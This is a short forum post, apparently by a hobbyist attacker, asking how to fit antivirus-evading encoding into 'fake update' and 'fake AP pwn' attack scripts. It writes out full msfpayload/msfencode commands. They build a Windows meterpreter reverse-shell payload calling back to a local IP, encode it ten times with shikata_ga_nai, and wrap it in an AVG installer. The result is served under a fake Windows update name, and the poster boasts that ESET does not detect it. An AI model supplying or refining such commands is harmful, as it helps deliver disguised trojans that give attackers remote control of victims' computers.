Hi fellaz,

Im trying to modify the fake metaslpoit update and fake ap pwn script to add a different encoding option in the payload with shikata_ga_nai:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.75 LPORT=9090 R | msfencode -x avg_free_stb_all_9_114_cnet.exe -t exe -e x86/shikata_ga_nai -c 10 -o avg.exe

trying to just add the encoding part so will use (ie

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.75 R | msfencode -x avg_free_stb_all_9_114_cnet.exe -t exe -e x86/shikata_ga_nai -c 10 -o /var/www/Windows-KB183905-x86-ENU.exe

My Eset security picks up the windows update which is encoded different to mine but does NOT flag my payload, Where would i put my encode in the script and does the update come via microsoft first downloaded to www then encoded from www folder on the fly.

this payload does not get flagged in ESET and could be ultimate setup for both fake update and ap pwn.

Please help I was up till 4 am trying diffent options ie creating payload first and the directing script to http:\\192.168.1.75:80 Windows-KB183905-x86-ENU.exe somethings missing cos it did work cant remember if needed /var/www/as well in url.


regards dee